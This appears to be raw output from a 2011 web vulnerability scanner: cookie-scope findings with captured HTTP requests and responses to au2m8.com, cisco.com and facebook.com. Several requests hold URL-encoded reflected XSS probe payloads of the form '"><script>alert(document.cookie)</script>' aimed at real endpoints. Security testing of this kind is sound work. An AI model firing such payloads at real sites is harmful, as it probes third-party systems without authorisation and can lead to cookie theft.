GET /v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1&jr=2 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; countryID=us; bpl1296950890=1296947290; bpl1296950905=1296947305; videoID=expired; auto=expired; playlist=5731; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; countryID=us; bpl1296950890=1296947290; videoID=expired; auto=expired; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/ HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1297002333=1296998733; bpl1296950890=1296947290; bpl1296950921=1296947321; bpl1297002238=1296998638; bpl1297002318=1296998718; videoID=expired; bpl1297002302=1296998702; bpl1297002287=1296998687; bpl1296950936=1296947336; j2playlist=4881; auto=expired; bpl1296950967=1296947367; playlist=5731%2C4881; bpl1297002348=1296998748;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/index.php HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1297002333=1296998733; bpl1296950890=1296947290; bpl1296950921=1296947321; bpl1297002238=1296998638; bpl1297002318=1296998718; videoID=expired; bpl1297002302=1296998702; bpl1297002287=1296998687; bpl1296950936=1296947336; j2playlist=4881; auto=expired; bpl1296950967=1296947367; playlist=5731%2C4881; bpl1297002348=1296998748;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/index.php HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1297002333=1296998733; bpl1296950890=1296947290; bpl1296950921=1296947321; bpl1297002238=1296998638; bpl1297002318=1296998718; videoID=expired; bpl1297002302=1296998702; bpl1297002287=1296998687; bpl1296950936=1296947336; j2playlist=4881; auto=expired; bpl1296950967=1296947367; playlist=5731%2C4881; bpl1297002348=1296998748;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/ HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml"><head><titl ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ipj/ HTTP/1.1 Host: www.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 21:53:45 GMT CDCHOST: ccows-sj-101 Content-Type: text/html Date: Sat, 05 Feb 2011 21:53:45 GMT Content-Length: 1295 Connection: close Set-Cookie: CP_GUTC=72.163.4.167.1296942825278234; path=/; expires=Wed, 30-Jan-36 21:53:45 GMT; domain=.cisco.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /warp/public/707/newsflash.html HTTP/1.1 Host: www.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 21:52:59 GMT CDCHOST: ccows-sj-202 Content-Type: text/html Date: Sat, 05 Feb 2011 21:53:45 GMT Content-Length: 1444 Connection: close Set-Cookie: CP_GUTC=72.163.4.169.1296942779477277; path=/; expires=Wed, 30-Jan-36 21:52:59 GMT; domain=.cisco.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html HTTP/1.1 Host: www.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=_8zhn; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=_8zhn; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:01:46 GMT Content-Length: 30973
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=V6SJp; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerry HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=V6SJp; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:02 GMT Content-Length: 40227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=udoDx; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryES HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=udoDx; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:03 GMT Content-Length: 166974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=4IO1b; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryFR HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=4IO1b; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:04 GMT Content-Length: 309302
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=5Sbol; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryNL HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=5Sbol; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:04 GMT Content-Length: 176442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=UTyVw; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryUK HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=UTyVw; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:04 GMT Content-Length: 38791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=jDrHM; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryZA HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=jDrHM; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:06 GMT Content-Length: 190060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Craig.Marshall.Deutschland HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=N7QZT; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FCraig.Marshall.Deutschland; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FCraig.Marshall.Deutschland; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:06 GMT Content-Length: 21873
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ajouli1 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=RGY-U; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fajouli1; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fajouli1; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:02 GMT Content-Length: 17726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /americanexpress HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=JMlNTQiqK0xyt0kGBu374Lk2; expires=Mon, 04-Feb-2013 22:03:16 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=si0H1; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:03:17 GMT Content-Length: 37259
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/impression.php?campaign_id=137675572948107&partner_id=us.blackberry.com&placement=like_box&extra_1=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ed0d62204af5%2F&extra_2=US HTTP/1.1 Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.facebook.com/plugins/likebox.php?id=13004060847&width=292&connections=10&stream=true&header=false&height=455 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dus.blackberry.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fus.blackberry.com%252Fsmartphones%252F94178%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ed0d62204af5%252F%26extra_2%3DUS; expires=Tue, 08-Mar-2011 13:32:56 GMT; path=/; domain=.facebook.com; httponly X-Cnection: close Date: Sun, 06 Feb 2011 13:32:56 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/landing.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Mon, 07-Mar-2011 22:38:41 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:38:41 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dcmoncayo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=0C9sx; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fdcmoncayo; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdcmoncayo; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:06 GMT Content-Length: 22952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fabianomorige HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=pH6X0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ffabianomorige; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffabianomorige; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:06 GMT Content-Length: 22768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /laprincesita.inigulable HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=mjsdQ; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flaprincesita.inigulable; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flaprincesita.inigulable; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:07 GMT Content-Length: 23661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
